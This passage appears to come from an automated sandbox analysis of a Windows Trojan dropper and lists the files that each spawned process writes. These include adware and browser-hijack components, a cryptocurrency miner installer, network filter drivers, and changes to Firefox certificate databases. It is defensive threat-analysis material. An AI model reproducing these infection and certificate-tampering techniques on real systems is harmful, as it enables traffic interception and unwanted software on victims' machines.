C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[2] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\registry.dll (812 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\verificar_ip[1].htm (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_gs[1] (61315 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe (2736 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_am2[1].exe (18984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\310714_is.exe (45524 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe (64441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_cr[1] (61024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmD143.tmp (3145 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe (64732 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe (64846 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe (34340 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe (33323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_mb[1] (1928 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\240714_ps[1].exe (32080 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe (127352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_is[1] (42448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe (20815 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe (7390 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\310714_br[1].exe (61429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_cp[1].exe (5984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_a9[1].exe (31080 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\291014_nj[1].exe (119929 bytes)

The process powershell.exe:3772 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2KY9FDOQT8H9H3WIW6VT.temp (196 bytes)

The process powershell.exe:3656 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCWG3ST52CQ8BWKM1ZUM.temp (196 bytes)

The process powershell.exe:3376 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\749D80PVBSBBMHTBLUY1.temp (196 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhED6B.tmp (112516 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhEA2F.tmp (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe (872 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\checks.txt (253 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\amisid.exe (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\cpuminer-x11opt-setup.exe (151433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\post_reply.htm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B7.tmp (3040 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll (812 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\cpuminer-x11opt-setup[1].exe (142739 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\nsisos.dll (13 bytes)

The process XTab_Setup2253.exe:1748 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
%Program Files% (x86)\XTab\skin\btn.png (2 bytes)
%Program Files% (x86)\XTab\install.data (68 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files% (x86)\XTab\HPNotify.exe (18514 bytes)
%Program Files% (x86)\XTab\conf (1626 bytes)
%Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1031.xpi (15 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\indexIE8.html (1794 bytes)
%Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
%Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\ver.txt (47 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
%Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
%Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
%Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
%Program Files% (x86)\XTab\CmdShell.exe (29 bytes)
%Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
%Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
%Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\main.xml (4 bytes)
%Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
%Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (21280 bytes)
%Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
%Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\ProtectService.exe (5469 bytes)
%Program Files% (x86)\XTab\web\js\js.js (18 bytes)
%Program Files% (x86)\XTab\skin\logo.png (5 bytes)
%Program Files% (x86)\XTab\web\js\xagainit2.0.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn5B4A.tmp\System.dll (23 bytes)
%Program Files% (x86)\XTab\web\main.css (19 bytes)
%Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\close.png (3 bytes)
%Program Files% (x86)\XTab\web\data.html (20 bytes)
%Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
%Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
%Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files% (x86)\XTab\skin\about.png (4 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\settings.png (5 bytes)
%Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
%Program Files% (x86)\XTab\web\js\common.js (2 bytes)
%Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files% (x86)\XTab\SupTab.dll (15928 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
%Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files% (x86)\XTab\msvcp110.dll (16990 bytes)
%Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)

The process cmdshell.exe:3596 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\HPNotify.exe (675 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tCE1709AA862C234DD936mp.tmp (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (304 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\conf (79 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\2[1].zip (213534 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\one.zip (29636 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (76078 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (10136 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\two.zip (74342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\1[1].zip (178958 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (12024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\DataBase (26688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowser.exe (5199 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\GOSafer\gosafer.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\GOSafer\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\GOSafer\nfapi.dll (4992 bytes)
%Program Files% (x86)\GOSafer\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\GOSafer\gosaferdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\gosaferdrv.sys (51 bytes)
%Program Files% (x86)\GOSafer\uninst.exe (1793 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssF4BB.tmp (67374 bytes)
%Program Files% (x86)\GOSafer\ProtocolFilters.dll (9320 bytes)
%Program Files% (x86)\GOSafer\libeay32.dll (35507 bytes)

The process nfregdrv.exe:3588 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\DesProtetor\nfapi.dll (118 bytes)

The process nfregdrv.exe:3076 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\ActSys\nfapi.dll (118 bytes)

The process nfregdrv.exe:1648 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\CashReminder\nfapi.dll (118 bytes)

The process nfregdrv.exe:3924 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\WNet\nfapi.dll (126 bytes)

The process nfregdrv.exe:3192 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\GOSafer\nfapi.dll (118 bytes)

The process HPNotify.exe:3640 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\conf (1480 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (24 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (24 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (24 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (49 bytes)

The process CashReminder.exe:3984 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\CashReminder\ProtocolFilters.dll (249 bytes)

The process CashReminder.exe:1108 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\P_StoreList.txt (784 bytes)
C:\Windows\Temp\P_RuleList.txt (265 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[2].txt (265 bytes)
C:\Windows\Temp\CashReminder\mfs162E.tmp (3516 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\stores[1].htm (784 bytes)
C:\Windows\Temp\CashReminder\mfs310F.tmp (229227 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\CashReminder\libeay32.dll (35507 bytes)
%Program Files% (x86)\CashReminder\nfapi.dll (4992 bytes)
C:\Windows\System32\drivers\crfilterdrv.sys (51 bytes)
%Program Files% (x86)\CashReminder\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscDFF3.tmp (66830 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\CashReminder\CashReminder.exe (15982 bytes)
%Program Files% (x86)\CashReminder\uninstall.exe (1568 bytes)
%Program Files% (x86)\CashReminder\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\CashReminder\ProtocolFilters.dll (9320 bytes)
%Program Files% (x86)\CashReminder\crfilterdrv.sys (1856 bytes)

The process ActSys.exe:148 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\ActSys\ProtocolFilters.dll (49 bytes)

The process ActSys.exe:3756 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\ActSys\SSL\NJax Intermediate.cer (774 bytes)
C:\Windows\Temp\ActSys\SSL\cert.db (2 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[4].txt (197 bytes)
C:\Windows\Temp\P_RuleList.txt (197 bytes)

The process certutil.exe:3280 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (720 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\cert8.db (7444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\key3.db (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (364 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\NSISEncrypt.dll (3323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsJSON.dll (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\lm (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\WmiInspector.dll (3137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\IpConfig.dll (4254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\tlg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\mj (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsExec.dll (14 bytes)

The process amisetup2899__9664.exe:3368 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\index[1].htm (1199 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe:typelib (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amitest.txt (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\amipb[1].js (21314 bytes)

The process GOSafer.exe:3284 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[3].txt (16 bytes)
C:\Windows\Temp\G_RuleList.txt (16 bytes)

The process GOSafer.exe:3264 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\GOSafer\ProtocolFilters.dll (249 bytes)

The process WNet.exe:4016 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\WNet\ProtocolFilters.dll (249 bytes)

The process WNet.exe:3080 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[1].txt (111 bytes)
C:\Windows\Temp\P_RuleList.txt (111 bytes)

The process 310714_is.exe:948 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\button-bg.png (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\ProgressBar.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo_new[1].png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\bootstrap_42881.html (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\button.css (417 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\declineBG[1].png (461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Loader.gif (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Yes_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ICReinstall_310714_is.exe (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg2.png (978 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\No_Button_Hover[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\Rerarapepe_b[1].png (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Yes_Button_Hover[1].png (1 bytes)
